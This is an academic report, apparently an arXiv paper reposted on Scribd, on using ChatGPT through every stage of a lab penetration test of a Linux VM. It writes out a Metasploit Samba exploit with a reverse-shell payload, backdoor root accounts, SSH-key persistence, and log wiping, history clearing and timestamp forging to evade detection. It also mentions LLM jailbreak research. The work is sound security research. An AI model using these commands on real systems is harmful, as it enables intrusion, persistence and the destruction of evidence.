0% found this document useful (0 votes)
250 views56 pages

Ai Enhanced Ethical Hacking

Uploaded by

myshellfr
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
250 views56 pages

Ai Enhanced Ethical Hacking

Uploaded by

myshellfr
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 56

AI-Enhanced Ethical Hacking: A Linux-Focused

Experiment

Haitham S. Al-Sinani and Chris J. Mitchell


1
Department of Cybersecurity and Quality Control, Diwan of Royal Court, Muscat,
Oman. [email protected]
2
Department of Information Security, Royal Holloway, University of London,
arXiv:2410.05105v1 [cs.CR] 7 Oct 2024

Egham, Surrey. TW20 0EX, UK. [email protected]

Abstract. This technical report investigates the integration of gener-


ative AI (GenAI), specifically ChatGPT, into the practice of ethical
hacking through a comprehensive experimental study and conceptual
analysis. Conducted in a controlled virtual environment, the study eval-
uates GenAI’s effectiveness across the key stages of penetration testing on
Linux-based target machines operating within a virtual local area net-
work (LAN), including reconnaissance, scanning and enumeration, gain-
ing access, maintaining access, and covering tracks. The findings confirm
that GenAI can significantly enhance and streamline the ethical hacking
process while underscoring the importance of balanced human-AI col-
laboration rather than the complete replacement of human input. The
report also critically examines potential risks such as misuse, data biases,
hallucination, and over-reliance on AI. This research contributes to the
ongoing discussion on the ethical use of AI in cybersecurity and high-
lights the need for continued innovation to strengthen security defences.

Keywords: AI · Ethical Hacking · GenAI · ChatGPT · Cybersecurity.

1 Introduction

Ethical hacking [14] is a crucial aspect of modern cybersecurity, yet it remains a


highly time-consuming and resource-intensive endeavour. It requires not only ad-
vanced expertise but also continuous knowledge updates to stay ahead of rapidly
evolving threats. Traditional ethical hacking approaches demand significant hu-
man involvement at each phase, from reconnaissance to vulnerability scanning
and exploitation, which increases both the time and overall costs involved.
Additionally, the process relies heavily on skilled professionals to effectively
identify and exploit vulnerabilities, making it challenging to keep up with the
growing scale and sophistication of attacks. These efforts are further constrained
by the limited capacity of human operators to manage complex or large-scale
environments without substantial investments in training and resources.
The integration of AI technologies, particularly GenAI, offers a promising
solution to the challenges faced in ethical hacking by automating and enhancing
2 H. Al-Sinani & C. Mitchell

various stages of the process. Tools like ChatGPT3 [5] allow ethical hackers
to streamline repetitive tasks, make faster decisions, and reduce the extensive
human input typically required. This not only addresses the time and capacity
limitations faced by operators but also lowers the implementation costs. GenAI’s
ability to analyse data, provide real-time insights, and optimise workflows leads
to more efficient, cost-effective security assessments.
This report presents a comprehensive experimental study evaluating the prac-
tical use of GenAI in a controlled Linux-based virtual environment. By simu-
lating key stages of ethical hacking, such as reconnaissance, scanning, gaining
& maintaining access, and covering tracks, this study demonstrates how GenAI
can enhance these processes and bolster cybersecurity defences. The findings
and observations documented here contribute to the ongoing discussion about
AI-human collaboration in cybersecurity, emphasising the potential of GenAI
to improve efficiency and reduce costs while maintaining the need for expert
oversight.
While previous research has explored the broader role of GenAI in cyberse-
curity, this report specifically examines its application in Linux-based environ-
ments, which are frequently targeted in both penetration testing and real-world
attacks. This work builds on our previously published research, in which we
proposed a conceptual model leveraging the capabilities of GenAI to support
ethical hackers across the five stages of ethical hacking [3]. It also expands on a
proof-of-concept implementation, used to conduct an initial experimental study
on the integration of AI into ethical hacking on target Windows VMs [2].
The remainder of this document is organised as follows. Section 2 explores
GenAI and ChatGPT. Section 3 presents the laboratory setup, and section 4
outlines our methodology. Section 5 details the execution of our experiment.
Section 6 discusses the potential benefits and risks. Section 7 reviews related
work, and, section 8 summarises our conclusions and outlines plans for future
work. Finally, appendix A lists all the figures referenced in this technical report.

2 Generative AI and ChatGPT


The advent of GenAI, with models like ChatGPT4 [5] prominent, represents a
major shift in the AI landscape. These systems, moving beyond the traditional
AI focus on pattern recognition and decision-making, excel in content creation,
including text, images, and code. The ability to learn from extensive datasets
and produce outputs that mimic human creativity is a major advance.
Central to this revolution is the GPT (Generative Pre-trained Transformer)
architecture, the basis of models like ChatGPT. Developed by OpenAI, GPT
models are built on deep learning techniques using transformer models, designed
specifically for handling sequential data. These models undergo pre-training,
where they learn from a wide array of various resources, including Internet texts,
followed by fine-tuning for specific tasks. This process enables models to grasp
3
https://openai.com/blog/chatgpt
4
https://openai.com/blog/chatgpt
AI-Enhanced Ethical Hacking 3

not just the structure of language but also its context, essential for generating
human-like text.
Each iteration of ChatGPT has demonstrated enhanced contextual under-
standing and output relevance. Its primary function lies in interpreting user
prompts and generating coherent, contextually appropriate responses. This ver-
satility extends from conducting conversations to performing complex tasks, in-
cluding coding, content creation, and, as we propose in this report, ethical hack-
ing. The GPT model family, including ChatGPT, owes much of its success to the
transformer model, introduced by Vaswani et al. in 2017 [15]. This architecture
revolutionises sequence processing through attention mechanisms, enabling the
model to focus on different parts of the input based on its relevance to the task.
The latest iteration, GPT-4o5 , provides significant advances in speed, multi-
modal capabilities, and overall intelligence. GPT-4o, now available to a broader
user base, including free-tier users, improves upon the GPT-4 model by offering
enhanced performance in understanding and generating text, as well as new ca-
pabilities in processing voice and images. These improvements position GPT-4o
as a powerful tool not only in natural language processing but also in applica-
tions such as real-time communication and data analysis, making it a key asset
in modern cybersecurity practices.
In exploring the intersection of AI and cybersecurity, understanding Chat-
GPT’s foundational aspects is vital. Its generative nature, contextual sensitivity,
and adaptive learning capacity can lead to innovative approaches in cybersecu-
rity practices. Our focus will be on how these qualities of ChatGPT can be
used to support ethical hacking, exploring the technical, ethical, and practical
implications.

3 Laboratory Setup

3.1 Physical Host and Virtual Environment Configuration

The experiments used a MacBook Pro with 16 GB RAM, a 2.8 GHz Quad-Core
Intel Core i7 processor, and 1 TB of storage, providing sufficient computational
capabilities for virtualisation (see Figs. 1 and 2).
Virtualisation of the network was achieved using VirtualBox 7 (see Fig. 3),
a reliable tool for creating and managing virtual machine environments. The
virtual setup included the following VMs.

1. Kali Linux VM: this machine functioned as the primary attack platform
for conducting the penetration tests. It is equipped with the necessary tools
and applications for ethical hacking.
2. Windows VM: this machine, running a 64-bit version of Windows Vista
with a memory allocation of 512 MB, was the principal target for penetration
testing within a previously conducted experiment [2].
5
https://openai.com/blog/chatgpt
4 H. Al-Sinani & C. Mitchell

3. Linux VM: this machine, operating on a 64-bit Linux Debian system and
allocated 512 MB of memory, is the primary focus of this report.

The network configuration was established in a local NAT (Network Address


Translation) setup, allowing for seamless communication between the VMs and
simulating a realistic network environment suitable for penetration testing.

3.2 Generative AI Tool

The experiment leveraged ChatGPT-46 (a paid version) for its advanced AI ca-
pabilities and efficient response time. The selection of ChatGPT-4 was also based
on its prominent status as a leading GenAI tool, offering cutting-edge technology
to enhance the ethical hacking process. Of course, other GenAI tools are also
available, e.g. Google’s Bard7 and GitHub’s Co-Pilot8 , which could potentially
be used in similar contexts. The methodologies and processes described are ap-
plicable to both the paid and free versions of ChatGPT, with the paid version
chosen for improved performance in this study.

4 Methodology

The experiment followed the structured phases of ethical hacking listed below,
with ChatGPT’s guidance integrated at each step.

1. Reconnaissance: ChatGPT was used to gather and analyse information


about the target VMs, including scanning to discover live machines.
2. Scanning and Enumeration: Network and vulnerability scanning were
conducted using tools such as nmap, with ChatGPT helping to interpret the
scan results and identify potential vulnerabilities.
3. Gaining Access (Linux VM): This phase focused on exploiting identi-
fied vulnerabilities using the Metasploit framework. ChatGPT assisted in
selecting and configuring the appropriate exploit.
4. Maintaining & Elevating Access: ChatGPT suggested methods for
maintaining access, such as creating backdoor accounts and escalating priv-
ileges within the compromised system.
5. Covering Tracks & Documentation: In the post-exploitation phase,
ChatGPT advised on strategies to effectively erase traces of the penetration
test, thereby reducing the likelihood of detection by system administrators.
This included log manipulation and account removal. Additionally, Chat-
GPT assisted in documenting the ethical hacking process, ensuring com-
prehensive reporting of methodologies, findings, and recommendations for
enhancing system security.
6
https://openai.com/index/hello-gpt-4o/
7
https://bard.google.com/
8
https://github.com/features/copilot/
AI-Enhanced Ethical Hacking 5

We initiated the experiment by asking ChatGPT to provide a concise ex-


planation of the five ethical hacking stages, along with a list of commonly used
Kali commands for each stage. ChatGPT provided an informative response, as
illustrated in Fig. 4.

5 Execution
We now summarise the experimental procedure for each stage.

5.1 Reconnaissance
There are two main types of reconnaissance (recon).
1. Passive Recon: This entails passive observation without active engage-
ment.
2. Active Recon: Active recon involves engaging with the target to prompt
responses for observation.
The emphasis here is on active reconnaissance; we followed the steps listed
below.

Notes on VM IP Address. First, observe that in our VirtualBox-driven,


NAT-based VM environment, the DHCP server is configured by default to dy-
namically assign IP addresses to the VMs. DHCP typically allocates IP ad-
dresses sequentially within the specified range. For instance, if the range is
192.168.1.0/24 (see Fig. 6 below), the first IP address assigned would likely be
192.168.1.1 (often reserved for the default gateway), followed by 192.168.1.2, and
so on. However, IP addresses may change between device sessions. The availabil-
ity of a specific IP address depends on several factors, including the DHCP lease
time and the currently active VMs. To maintain consistency in the experiment,
and because the originally assigned dynamic IP address for the Linux VM men-
tioned earlier (192.168.1.7) had changed, we opted to assign a static IP address,
reverting it to 192.168.1.7, as shown in Fig. 7 below. While this approach does
not scale well for large, enterprise-level networks, it is practical in our controlled
research environment.
1. Since we are starting a new ChatGPT session, we first inform ChatGPT
about our VM setup (see Fig. 5).
2. As an integral part of the initial reconnaissance phase, the aim is to identify
active machines within the target network in order to select a target. To
achieve this, we posed the following question to ChatGPT: “I’m currently
in the initial stage of ethical hacking, known as ‘reconnaissance’. Could you
please provide a list of the top 4 commands I can use on my Kali machine to
find out which devices are currently active on my local network?”. As shown
in Fig. 8, ChatGPT responded with a useful compilation of potential Kali
terminal commands, including nmap, netdiscover, and arp-scan, along with
examples of their use.
6 H. Al-Sinani & C. Mitchell

3. We next turned to our the Kali ‘attack’ machine, applying the ChatGPT
recommendations. As a result, we successfully identified the active devices
within the target network, as in Fig. 9.
4. To determine the IP address of the Kali ‘attack’ machine, we used the ‘host-
name’ command with the ‘-I’ option, as shown in Fig. 10.
5. To find potential target machines, the IP addresses of the Kali host, the
standard default gateway, and the DHCP server can be excluded. To sim-
plify this process and avoid the need to remember the relevant commands,
ChatGPT can be consulted for guidance. We first asked ChatGPT for the
commands to display the IP addresses of our Kali machine, the standard
default gateway, and the DHCP server, as shown in Fig. 11. We executed
these commands, as displayed in Fig. 12. We next asked ChatGPT to analyse
the output from the ‘arp-scan’ command, which lists active network nodes,
and the results from displaying the IP addresses for default IP addresses to
identify the role of each IP address, such as Kali machine, DHCP server,
etc. ChatGPT performed this analysis and provided responses in a question-
and-answer format, as shown in Figs. 13 and 14.
6. As a result of the analysis presented above, we identified the VMs with the
IP addresses 192.168.1.6 and 192.168.1.7 as potential targets. This allowed
us to proceed to the second scanning stage.

5.2 Scanning

During this stage, ethical hackers typically use automated tools to scan a target
system or network for vulnerabilities. This can include port scanning, vulner-
ability scanning, etc. In our specific scenario, the system demanding scanning
attention is the Linux machine with IP address: ‘192.168.1.7’.
To initiate this phase, we asked ChatGPT for key commands for gather-
ing comprehensive information about the specific target (192.168.1.7) using our
Kali machine. We informed ChatGPT that the goal was to gather extensive
intelligence on this system in preparation for an attack. As shown in Fig. 15,
ChatGPT provided a concise list of potential scanning commands, including the
use of nmap and its various capabilities. Interestingly, this output is significantly
more comprehensive than that which ChatGPT produced a year previously when
we asked a similar question for a different VM (Windows) [2], demonstrating the
model’s improvement over time.
We further engaged with ChatGPT, requesting a single ‘nmap’ command
that could gather as much information as possible about the target (192.168.1.7),
including scanning all ports and saving the output in all supported ‘nmap’ for-
mats. ChatGPT correctly recommended the command ‘nmap -p- -A -T4 -oA
scan results 192.168.1.7’, providing a detailed breakdown of the command’s op-
tions, as illustrated in Fig. 16. The options in this ‘nmap’ command have the
following effects:

– -p-: scans all 65,535 TCP ports;


– -A: enables OS detection, version detection, script scanning, and traceroute;
AI-Enhanced Ethical Hacking 7

– -T4: sets the timing template to ‘Aggressive’ for faster scanning; and
– -oA scan results: saves the output in all three major ‘nmap’ formats
(.nmap, .xml, and .gnmap) with the base name ‘scan results’.

We then executed the ChatGPT-suggested command ‘nmap -p- -A -T4


-oA scan results 192.168.1.7’ to perform a comprehensive scan of the target
machine. The ‘nmap’ scan results, clearly identifying the Linux target VM, are
presented in Fig. 17. We then asked ChatGPT to analyse these results and
provide suggestions for potential unauthorised access routes, preparatory for the
next phase in which we attempt to gain access.

5.3 Gaining Access

In this phase, we sought guidance from ChatGPT to gain access to the Linux VM
with the IP address ‘192.168.1.7’ using our Kali attack machine. To streamline
the process, we decided to exploit an SMB-related vulnerability via Metasploit.
The ‘nmap’ scan revealed that the target machine supports SMB version 2,
which is outdated and known to have vulnerabilities. ChatGPT provided a de-
tailed guide on how to use Metasploit to confirm the SMB version, as shown in
Fig. 18, which we followed. We started Metasploit with the command ‘msfcon-
sole’, selected the ‘auxiliary/scanner/smb/smb version’ module, set the target
IP with ‘set RHOSTS 192.168.1.7’, and executed the module with ‘run’. The
Metasploit output confirmed the ‘nmap’ results, indicating that our target in-
deed supports SMB version 2, as shown in Fig. 19.
Following this confirmation, we asked ChatGPT which vulnerability pos-
sessed by Metasploit could be exploited to gain access. As shown in Figs. 20
and 21, ChatGPT recommended the use of the “Samba ‘trans2open’ overflow”
exploit in Metasploit, which is specifically designed to target older versions of
Samba, such as 2.2.1a. ChatGPT also provided step-by-step instructions on how
to exploit this vulnerability using Metasploit.
As shown in Fig. 22, we followed ChatGPT’s instructions to exploit the well-
known trans2open vulnerability. However, when we attempted to run the exploit,
we encountered an error since the payload suggested by ChatGPT was incom-
patible. This demonstrates that, while ChatGPT is a powerful tool, it is not
infallible and can make mistakes. We presented the error directly to ChatGPT
without specifically requesting a solution, and ChatGPT promptly suggested a
fix (see Fig.24). We applied the suggested fix, as shown in Fig. 23, and success-
fully gained root access to the target Linux machine (see Fig. 25).
To summarise, in order to gain access to the target machine (192.168.1.7) us-
ing the ‘trans2open’ exploit via Metasploit, we started Metasploit with ‘msfcon-
sole’, selected the exploit module with ‘use exploit/linux/samba/trans2open’, set
the payload with ‘set payload linux/x86/shell/reverse tcp’, configured the target
IP with ‘set RHOSTS 192.168.1.7’, set the ‘LHOST’ to the attacking machine’s
IP (192.168.1.4), accepted the default ‘LPORT’ of 4444, and then ran the exploit
with ‘run’.
8 H. Al-Sinani & C. Mitchell

5.4 Maintaining Access


In this phase, the objective is to ensure we can re-enter the target system in
future, ideally without being detected. Typically, achieving persistent access re-
quires elevated privileges, often in the form of administrator or root access. As
a result, we could turn to ChatGPT to assist us in elevating our access level.
Helpfully, in the previous stage, we successfully exploited the ‘trans2open’ vul-
nerability, which granted root access (see Fig. 25), the highest possible level of
access.
However, as we only obtained a basic, limited shell in the previous step, we
first needed to stabilise and potentially upgrade this shell. In response to our re-
quest, ChatGPT provided a brief guide (see Fig. 26) for using the bash terminal
in interactive mode by running the command ‘/bin/bash -i’ (see Fig. 27). Ad-
ditionally, ChatGPT advised on upgrading the current shell to the more powerful
‘meterpreter’ using Metasploit. The recommended steps are: in Metasploit, use
post/multi/manage/shell to meterpreter, set SESSION <session id>, and
execute the module with ‘run’ to upgrade the shell. Despite following these
steps, the newly created meterpreter session terminated (see Fig. 28). Although
ChatGPT provided several potential solutions, we were unable to resolve the
issue and will address it in future work.
With this in mind, we next consulted ChatGPT for guidance on maintaining
persistent access. In response to the query shown in Fig. 29, ChatGPT provided
a list of recommendations for establishing persistent access (see Fig. 30). These
recommendations include creating a new root user for alternative access, setting
up a persistent reverse shell, installing an SSH key for password-less access,
establishing a cron job for regular reverse shell connections, and backing up
important files. We next attempted to implement two of these approaches, as
outlined below.

Creating a New User. As shown in Fig. 31, we first created a new root
user employing the command ‘useradd -m -s /bin/bash -G root Haitham’.
This command creates a new user named ‘Haitham’, sets up a home directory
at /home/Haitham with the -m option, assigns /bin/bash as the default shell
with the -s option, and includes the user in the root group with the -G op-
tion, thereby granting elevated permissions (see Fig. 35). We further used the
command ‘passwd Haitham’ to set up a new password for the newly added
user (see Fig. 33 and Fig. 34). We verified that the user was indeed added by
checking for a new entry in both the /etc/passwd and /etc/shadow files. We
also confirmed that the user was added to the root group using the command
‘groups Haitham’, and by also reviewing the /etc/sudoers file (see Fig. 36).
Subsequently, we tested this by restarting the Linux target machine and success-
fully confirmed our ability to log in using the newly created user through the
standard Linux login procedure.
Since port 22 is open, we established an SSH session using the newly added
user credentials (see Fig. 37), which provided a more stable shell with double-tab
auto-completion and history features enabled by default. This SSH session can
AI-Enhanced Ethical Hacking 9

be established even after reboots, as long as the target machine (192.168.1.7)


remains operational.

Enabling SSH Password-less Access. To further evaluate ChatGPT’s capa-


bilities, we requested a step-by-step guide for enabling password-less SSH public-
key authentication from our Kali machine (192.168.1.4) to the Linux target
(192.168.1.7). While ChatGPT’s initial response was useful, it was not entirely
accurate. After a series of interactions, we managed to prompt ChatGPT to add
the missing steps and provide a more precise explanation (see Figs. 38 to 40).
This reinforces the conclusion that relying on human-AI collaboration is crucial,
rather than solely depending on AI to replace human input.
In summary, to enable password-less SSH access, we performed the following
steps.

1. We first generated an SSH key pair on the Kali machine using ‘ssh-keygen
-t rsa -b 4096’.
2. We next copied the public key to the target machine by executing the com-
mand ‘ssh-copy-id [email protected]’ on our Kali machine.
3. We enabled SSH public-key, password-less authentication on the target ma-
chine by adding ‘PubkeyAuthentication yes’ to the ‘/etc/ssh/sshd config’
file, and then restarted the SSH service with ‘sudo systemctl restart
sshd’.
4. We also ensured correct file permissions on the target machine with the com-
mands: ‘chmod 700 /.ssh && chmod 600 /.ssh/authorized keys’.
5. Finally, we tested the connection from the Kali machine using the command:
‘ssh [email protected]’.

5.5 Covering Tracks and Documentation

This (final) ethical hacking phase has two main components:

1. covering our tracks, which involves erasing or minimising evidence of our


activities within the target system, crucial to avoid detection and maintain
the system as close to its original state as possible; and
2. documentation, involving creating the pen-test report, a topic discussed
later.

Covering Tracks. First, aiming to remain undetected, we asked ChatGPT for


guidance. As shown in Figs. 41 and 42, ChatGPT provided a list of actions,
including the following.

– Clear Command History: Clear the current session’s history and remove
the history file using ‘history -c && history -w’ and ‘rm /.bash history’.
– Disable Future History Logging: Disable history logging for the session
with ‘unset HISTFILE’, ‘export HISTSIZE=0’, and ‘export HISTFILESIZE=0’.
10 H. Al-Sinani & C. Mitchell

– Remove Log Entries: Empty critical log files without deleting them using
‘echo > /var/log/auth.log’, ‘echo > /var/log/syslog’, and ‘echo >
/var/log/secure’.
– Clean SSH Artifacts: Remove the SSH key and check SSH logs for the
hacking activities using ‘rm /.ssh/authorized keys’ and ‘sudo nano
/var/log/auth.log’.
– Delete Temporary Files: Remove temporary files that could reveal the
pen-test activities using ‘rm -rf /tmp/*’ and ‘rm -rf /var/tmp/*’.
– Remove ‘Haitham’ User: Delete the ‘Haitham’ user and the correspond-
ing home directory using ‘userdel -r Haitham’.
– Clear Scheduled Tasks: Remove all cron jobs for the current user with
‘crontab -r’.
– Flush ARP Cache: Clear the ARP cache to remove traces in the network
using ‘ip -s -s neigh flush all’.
– Reset Terminal and Exit: Clear the terminal screen and exit the shell
cleanly using ‘reset’ and ‘exit’.

To underscore the significance of AI-human collaboration, we observed that


ChatGPT omitted certain additional crucial steps for covering tracks, specifically
updating timestamps and using the shred command. We, therefore, consulted
ChatGPT about these two commands, as outlined below.

Updating Timestamps for Track Covering. In response to a query (see


Figs. 43 and 44), ChatGPT outlined the process for modifying file timestamps
to cover tracks. This involves using ‘stat filename’ to display the current
access, modification, and change times. One can then update these timestamps
as follows:
– set both access and modification times to a specific date and time with
‘touch -t YYYYMMDDHHMM filename’;
– modify only the access time with ‘touch -a -t YYYYMMDDHHMM filename’;
– adjust only the modification time with ‘touch -m -t YYYYMMDDHHMM filename’;
or
– align the timestamps of a file with those of another file using ‘touch -r
reference file target file’.
Finally, verify the changes using ‘stat filename’.

Using shred for Secure File Deletion. In response to our question (see
Figs. 45 and 46), ChatGPT explained that shred is a command-line utility in
Linux used to securely delete files by overwriting their contents with random
data multiple times, making it extremely difficult to recover the original data.
The command ‘shred -uvfz -n 5 old authorized keys’ operates as follows:

– -u: unlinks (deletes) the file after shredding;


– -v: displays verbose progress of the shredding operation;
AI-Enhanced Ethical Hacking 11

– -f : forces shredding of files even if they are read-only;


– -z: adds a final overwrite with zeros to obscure the fact that the file was
shredded; and
– -n 5: specifies that the file should be overwritten 5 times with random data.

In this example, the command securely deletes the file old authorized keys
by overwriting it five times with random data, adding a final overwrite with
zeros, showing progress, forcing the operation even if the file is read-only, and
then deleting the file.
Finally, while we implemented some of these recommendations, it is worth
noting ChatGPT’s advice that clearing logs can raise suspicion in real-world
scenarios and might not always be advisable.

Documentation. For documentation, ethical hackers need to produce a com-


prehensive and thorough report for each penetration testing assignment. To en-
sure the quality and completeness of our report, we enlisted ChatGPT’s assis-
tance in composing a detailed report for our penetration testing (simulation)
assignment using the information already present in this paper.
As shown in Figs. 47 and 48, we first asked ChatGPT about the key sections
of a standard penetration testing report. ChatGPT provided a template that
we could use to structure our report, along with guidance on what to include
in each section. Following this, we requested ChatGPT to draft a standard pen-
etration testing report based on this research paper, where we simply copied
and pasted all the relevant sections into the ChatGPT prompt (see Fig. 49). We
instructed ChatGPT to ensure that all key sections were included and to sim-
ulate a real-world penetration testing assignment as closely as possible, rather
than presenting it merely as a research exercise. ChatGPT responded with a
well-written and accurate penetration test report, including sections such as
the ‘Executive Summary,’ ‘Introduction,’ ‘Methodology,’ ‘Findings and Results,’
‘Attack Narrative,’ and ‘Conclusions and Recommendations,’ along with sug-
gestions for ‘Appendices.’ In subsequent interactions with ChatGPT, we further
refined and enhanced the report, adding details such as the author of the pen-
test, the time period, and the date (see Figs. 50 to 53).
In summary, this report presents the findings and results of a penetration
testing assignment aimed at evaluating the security of a Linux VM operating
as a node within a virtual LAN environment. The test uncovered a critical vul-
nerability in the outdated SMB service, which was exploited to gain root access
to the system. Persistent access was established by creating a new root user
and enabling password-less SSH authentication, while evidence of the penetra-
tion test was effectively covered. The report, titled Penetration Test Report for
Linux-Based Systems, includes key sections such as Scope, Methodology, Find-
ings, Risk Analysis, and Recommendations, and recommends immediate updates
to the SMB service, hardening SSH configurations, and ongoing vulnerability as-
sessments to strengthen the system’s security posture.
12 H. Al-Sinani & C. Mitchell

6 Discussion: Benefits and Risks


Ethical hacking, a critical component of comprehensive security strategies, is a
promising arena for the application of advanced AI systems like ChatGPT. Using
the generative and understanding capabilities of ChatGPT we can envision a
paradigm shift in how security assessments and penetration tests are conducted.
ChatGPT’s potential in automating the scripting and execution of sophisti-
cated penetration tests is very significant. The model’s capacity to write code
enables it to generate custom scripts tailored to specific environments or sce-
narios. It could potentially analyse a target system’s architecture and suggest
relevant tests, thereby streamlining the reconnaissance phase of ethical hacking.
Beyond scripting, the interactive nature of ChatGPT makes it an ideal as-
sistant for real-time problem-solving during penetration testing. Ethical hackers
can consult the model for troubleshooting, brainstorming exploitation strate-
gies, or even for learning about novel vulnerabilities and techniques on-the-fly.
Its vast knowledge base can act as an immediate reference for the latest Common
Vulnerabilities and Exposures (CVEs) and mitigation strategies.
The adaptability of ChatGPT also suggests a role in social engineering simu-
lations. It could craft credible phishing emails, create dialogue for vishing (voice
phishing), or assist in developing pretext scenarios for physical security breaches.
This would enable organisations to better train their staff against a variety of
social engineering attacks.
From a defensive standpoint, ChatGPT can be used to simulate an attacker’s
mindset and tactics. It can help in generating hypothetical attack scenarios,
thereby allowing security teams to better prepare and defend against potential
breaches. Moreover, the AI’s capability to interpret a wide range of data could
be pivotal in anomaly detection, effectively identifying unusual patterns that
may signify a security threat.
However, when integrating AI, particularly ChatGPT, into ethical hacking,
a thorough examination of ethical considerations is essential. Using AI in cyber-
security aids efficiency and effectiveness but also raises serious concerns around
data privacy, informed consent, and potential misuse. The reliance on advanced
AI systems like ChatGPT poses risks, such as the unintentional discovery and ex-
ploitation of zero-day vulnerabilities. This could inadvertently provide malicious
actors with powerful tools to exploit these vulnerabilities before they are known
to the broader security community. Moreover, the automation of processes like
social engineering by AI raises significant ethical questions. These tools could
be misused to conduct highly sophisticated and targeted cyber-attacks, blurring
the boundary of ethical hacking practices.
AI systems inherently process vast amounts of data, some of which may be
sensitive or personal, thus their use necessitates strict adherence to data privacy
laws and ethical guidelines. Ensuring that the data used for training and opera-
tion is in compliance with privacy laws and ethical guidelines becomes paramount
to maintaining the integrity of cybersecurity efforts. The ethical hacking princi-
ples of “legality, non-disclosure, and intent to do no harm” must be rigorously
upheld in the AI domain to prevent unauthorised or unintended use. Addi-
AI-Enhanced Ethical Hacking 13

tionally, AI-facilitated simulations of cyber-attacks for training or testing must


involve fully informed consent from all parties.
Moreover, the risk of ChatGPT generating inaccurate or fabricated infor-
mation —known as hallucination— can result in misguided decisions in cyber-
security. This underscores the importance of human-AI collaboration, vigilant
oversight, and robust ethical standards in the field of AI-assisted cybersecurity.
In conclusion, combining ChatGPT’s AI capabilities with ethical hacking of-
fers a promising new frontier in cybersecurity. With its sophisticated language
processing and generation abilities, ChatGPT could revolutionise the way eth-
ical hacking is performed, making it more efficient, comprehensive, and up-to-
date with current threats. However, this technological leap forward must be
approached with caution, ensuring that its application in ethical hacking aligns
with the highest standards of security and ethical practice.

7 Related Work
The intersection of AI and cybersecurity is a highly active area of research, with
studies ranging from AI’s role in detecting intrusions to aiding in offensive se-
curity including ethical hacking. The rise of sophisticated language models like
GPT-3, introduced by Brown et al. [5], has expanded research possibilities by en-
abling strong performance on various tasks, including of course cybersecurity as
we show in this report. Handa et al. [9] review the application of machine learning
in cybersecurity, emphasizing its role in areas like zero-day malware detection
and anomaly-based intrusion detection, while also addressing the challenge of
adversarial attacks on these algorithms. Other studies, including that by Gupta
et al. [8], examine the dual role of GenAI models like ChatGPT in cybersecurity
and privacy, highlighting both their potential for malicious use in attacks such
as social engineering and automated hacking, and their application in enhancing
cyber defense measures.
Moreover, Large Language Models (LLMs), a form of GenAI, are being ap-
plied across various domains, including cybersecurity. For example, they are
used to fix vulnerable code [13] and identify the root causes of incidents in cloud
environments [1]. In addition, various LLM-based tools have been recently de-
veloped, such as Code Insight9 by VirusTotal, which analyses and explains the
functionality of malware written in PowerShell. Furthermore, tools for vulnera-
bility scanning10 and penetration testing11 [6] have also emerged lately.
A recent practical study by Harrison et al. [10] shows how advances in AI’s
deep learning algorithms can be used to enhance acoustic side-channel attacks
against keyboards, achieving impressive keystroke classification accuracy via
common devices like smartphones and Zoom. This development poses a sig-
nificant threat, potentially enabling the theft of sensitive information such as
9
https://blog.virustotal.com/2023/04/introducing-virustotal-code-insight.
html
10
https://github.com/aress31/burpgpt
11
https://github.com/GreyDGL/PentestGPT
14 H. Al-Sinani & C. Mitchell

passwords and PINs from devices without needing physical access to the vic-
tim’s machine. A recent panel discussion, [4], also highlighted the dual role of
AI in enhancing cybersecurity while addressing the rising threat of adversarial
attacks that exploit AI system vulnerabilities.
Recent research has also identified new vulnerabilities in the security mech-
anisms of LLMs. Jiang et al. [11] introduced ‘ArtPrompt’, an innovative ASCII
art-based jailbreak attack that exploits the inability of LLMs to recognise
prompts encoded in ASCII art. This work underscores the need for further
research into the robustness of AI models, particularly as these vulnerabilities
can bypass safety measures and induce undesired behaviors in state-of-the-art
LLMs such as GPT-4 and Claude.
Park et al. [12] introduce a technique for automating the reproduction of 1-
day vulnerabilities using LLMs. Their approach involves a three-stage prompting
system, guiding LLMs through vulnerability analysis, identifying relevant in-
put fields, and generating bug-triggering inputs for use in directed fuzzing. The
method, tested on real-world programs, showed some improvements in fuzzing
performance compared to traditional methods. This research demonstrates the
potential of LLMs to enhance cybersecurity processes, particularly in automating
complex tasks such as vulnerability reproduction.
Fujii and Yamagishi [7] explore the use of LLMs to support static malware
analysis, demonstrating that LLMs can achieve practical accuracy. A user study
was conducted to assess their utility and identify areas for future improvement.
Our experimental research work seeks to expand on these discussions, explor-
ing ChatGPT’s role across all stages of ethical hacking — a topic that remains
under-explored in the existing literature. We aim to provide a comprehensive
framework for integrating generative language models into ethical hacking, evi-
dencing AI’s multifaceted role in cybersecurity. We have also sought to empiri-
cally validate claims and assertions regarding the capabilities of ChatGPT in the
ethical hacking domain through a series of controlled, research-driven, lab-based
experiments.

8 Conclusions and Future Work

We have proposed an approach to enhancing ethical hacking by using GenAI,


specifically ChatGPT. This approach was validated through a comprehensive
experimental study and conceptual analysis conducted within a controlled vir-
tual environment. Our evaluation focused on key stages of penetration testing
on Linux-based target machines operating within a virtual local area network,
encompassing reconnaissance, scanning and enumeration, gaining access, main-
taining access, covering tracks, and reporting.
The study confirms that ChatGPT can significantly enhance and streamline
the ethical hacking process, particularly by providing support in decision-making
and automating repetitive tasks. However, our research also shows the critical
importance of maintaining a balanced human-AI collaboration. AI should com-
AI-Enhanced Ethical Hacking 15

plement, not replace, human expertise in cybersecurity, to mitigate potential


risks such as misuse, data biases, and over-reliance on automated systems.
Looking forward, future work should explore the potential application of
AI in cybersecurity in more diverse and complex environments beyond Linux-
based systems. The work described here sets the basis for a series of future,
hands-on, research-driven experiments aimed at not only further substantiating
the claims made in this report but also at refining it to encompass a wider
array of hacking domains. Future efforts will concentrate on using ChatGPT
for penetration testing in environments operating on MacOS, android and iOS,
thereby broadening the reach of our research. Additionally, we plan to broaden
the application of our methods across various ethical hacking fields, including
privilege escalation, wireless security, the OWASP top 10 (web12 and mobile13 )
vulnerabilities, and mobile app security. Through these experiments, we will
continuously evolve the proposed ChatGPT-penetration testing model to address
the rapidly evolving landscape of cyber threats, ensuring its effectiveness against
the attack vectors of the future.
There is also a need to address the ethical and security challenges associated
